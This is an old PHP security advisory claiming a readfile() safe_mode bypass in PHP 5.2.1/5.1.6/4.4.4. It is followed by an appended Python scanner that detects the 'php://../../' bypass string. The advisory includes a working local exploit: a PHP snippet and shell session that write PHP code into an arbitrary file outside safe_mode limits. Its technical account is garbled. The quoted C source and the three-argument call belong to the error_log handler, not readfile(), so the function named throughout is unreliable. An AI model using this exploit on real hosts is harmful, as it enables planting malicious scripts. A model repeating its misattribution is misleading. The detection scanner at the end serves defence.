`SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007
Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4
[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]
Author: ThE-WoLf-KsA
Date:
- Written: 24.3.2007
--- 0.Description ---
--- 1. readfile() Safe Mode Bypass ---
The readfile() function reads through a file and displays it, given a
file or path. You can read into files. The issue is very simple:
readfile() checks safe_mode and open_basedir in the stream function,
but use of a URL isn't allowed, and the problem exists with an
incorrect filename.
PHP5:
-2013-2050---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt,
                         char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {
        case 1: /* send an email */
            {
#if HAVE_SENDMAIL
                if (!php_mail(opt, "PHP error_log message",
                              message, headers, NULL TSRMLS_CC)) {
                    return FAILURE;
                }
#else
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
                return FAILURE;
#endif
            }
            break;

        case 2: /* send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3: /* save to a file */
            stream = php_stream_open_wrapper(opt, "a",
                    IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
-2013-2050---
Let's look at option 3.
-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
        ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---
Option "a" writes the error to the file or, if the file doesn't
exist, creates a new file.
The problem is that "IGNORE_URL" is set in the call to
php_stream_open_wrapper().
IGNORE_URL turns off safe_mode if you use
"prefix://../../".
-Example---
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'
Warning: readfile(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1
Warning: readfile(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
-Example---
--- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
--- 4. Greets ---
SniPer_hex
--- 5. Contact ---
[email protected]
`
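For administrators of shared hosts still running the affected versions, the "prefix://../../" string described above is easy to hunt for in uploaded scripts. The following scanner is an added example, not part of the original advisory; the sample PHP text is constructed, and the `collapsed` field assumes the string ends up being opened as a plain relative path, which matches the `ls` output in the advisory's example.

```python
import posixpath
import re

# Constructed PHP sample: one genuine wrapper URL and two bypass-shaped strings.
SAMPLE = r'''<?php
$in = fopen("php://stdin", "r");
$file = "www/temp/sr.php";
readfile("<? echo \"cx\"; ?>", 3,
"php://../../" . $file);
readfile("x", 3, 'php://../../www/temp/sr.php');
?>'''

# Any single- or double-quoted PHP string literal, honouring backslash escapes.
LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
# "<scheme>://" followed directly by "../": the shape of the page's "prefix://../../".
PREFIX_TRAVERSAL = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)://(?:\.\./)+")


def collapse(literal):
    """Assumption: path named by the literal when opened as a plain relative path."""
    return posixpath.normpath(literal)


def scan(source):
    """Return one finding per string literal shaped like the bypass prefix."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in LITERAL.finditer(line):
            text = match.group(2)
            hit = PREFIX_TRAVERSAL.match(text)
            if hit:
                findings.append({
                    "line": lineno,
                    "scheme": hit.group(1),
                    "literal": text,
                    "collapsed": collapse(text),
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"line {f['line']}: {f['literal']!r} -> {f['collapsed']}")
```

A genuine wrapper URL such as `php://stdin` is not flagged, because the pattern requires `../` immediately after `://`.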